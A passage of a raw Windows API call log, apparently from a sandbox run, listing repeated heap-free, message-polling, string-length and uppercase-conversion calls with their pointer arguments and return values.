lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0085.158] lstrlenW (lpString="20") returned 2 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ad8 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08b8 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe08 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe08 | out: hHeap=0x2af0000) returned 1 [0085.159] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.159] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ad8 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0528 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0768 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04c8 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0085.159] lstrlenW (lpString="30") returned 2 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0828 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08b8 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04b0 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe08 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04b0 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0085.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.160] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.160] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b38 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08b8 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0528 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.160] lstrlenW (lpString="20") returned 2 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0768 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07c8 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04c8 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04b0 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04c8 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04b0 | out: hHeap=0x2af0000) returned 1 [0085.160] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0085.160] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04b0 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04c8 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e90 | out: hHeap=0x2af0000) returned 1 [0085.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79010 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a98 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78f98 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79060 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0085.161] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.161] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.161] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.161] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.161] lstrlenW (lpString="20") returned 2 [0085.161] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.161] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.161] lstrlenW (lpString="31") returned 2 [0085.161] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.161] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.161] lstrlenW (lpString="20") returned 2 [0085.161] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.161] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.161] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.161] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.162] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.162] SetLastError (dwErrCode=0x0) [0085.162] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.162] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0085.162] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.162] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.162] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.162] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0085.162] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.162] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0085.162] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.162] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.162] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.162] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.162] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.162] lstrlenW (lpString="62") returned 2 [0085.162] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.162] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.162] lstrlenW (lpString="6F") returned 2 [0085.162] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.162] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.162] lstrlenW (lpString="6F") returned 2 [0085.162] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] lstrlenW (lpString="6C") returned 2 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] lstrlenW (lpString="43") returned 2 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] lstrlenW (lpString="72") returned 2 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] lstrlenW (lpString="79") returned 2 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] lstrlenW (lpString="70") returned 2 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] lstrlenW (lpString="74") returned 2 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] lstrlenW (lpString="43") returned 2 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.163] lstrlenW (lpString="72") returned 2 [0085.163] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] lstrlenW (lpString="65") returned 2 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] lstrlenW (lpString="61") returned 2 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] lstrlenW (lpString="74") returned 2 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] lstrlenW (lpString="65") returned 2 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] lstrlenW (lpString="48") returned 2 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] lstrlenW (lpString="61") returned 2 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] lstrlenW (lpString="73") returned 2 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] lstrlenW (lpString="68") returned 2 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.164] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] lstrlenW (lpString="68") returned 2 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] lstrlenW (lpString="61") returned 2 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] lstrlenW (lpString="6E") returned 2 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] lstrlenW (lpString="64") returned 2 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] lstrlenW (lpString="6C") returned 2 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] lstrlenW (lpString="65") returned 2 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] 